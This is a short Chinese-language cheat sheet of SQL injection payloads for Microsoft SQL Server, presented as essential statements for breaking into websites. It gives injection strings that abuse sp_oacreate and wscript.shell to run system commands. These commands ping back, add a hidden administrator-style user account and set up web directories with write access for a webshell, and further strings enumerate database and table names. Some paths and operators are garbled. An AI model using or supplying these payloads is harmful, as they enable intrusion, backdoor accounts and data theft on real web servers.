入侵网站必备Sql语句:(经典语句)

核心提示： inetpubwwwrootxplog70.dll--反向PING自己实验;use master;declare @sint;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod@s,"run&quo

inetpubwwwrootxplog70.dll--

反向PING自己实验

;use master;declare @s
int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod
@s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

加帐号

;DECLARE @shell
INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP
_OAMETHOD @shell,run,null, C:WINNTsystem32cmd.exe /c net user jiaoniang$
1866574 /add--

创建一个虚拟目录E盘：

;declare @o int exec
sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run,
NULL, cscript.exe c：inetpubwwwrootmkwebdir.vbs -w "默认Web站点" -v "e","e： "--

访问属性：（配合写入一个webshell）

declare @o int exec sp_oacreate
wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe
c：inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse

爆库

特殊技巧：:%5c= 或者把/和 修改%5提交

and 0(select top 1 paths from

newtable)--

得到库名（从1到5都是系统的id，6以上才可以判断）

and 1=(select name from
master.dbo.sysdatabases where dbid=7)--
and 0(select count(*) from
master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9....

得到更多的数据库名

and 0(select top 1 name from

bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin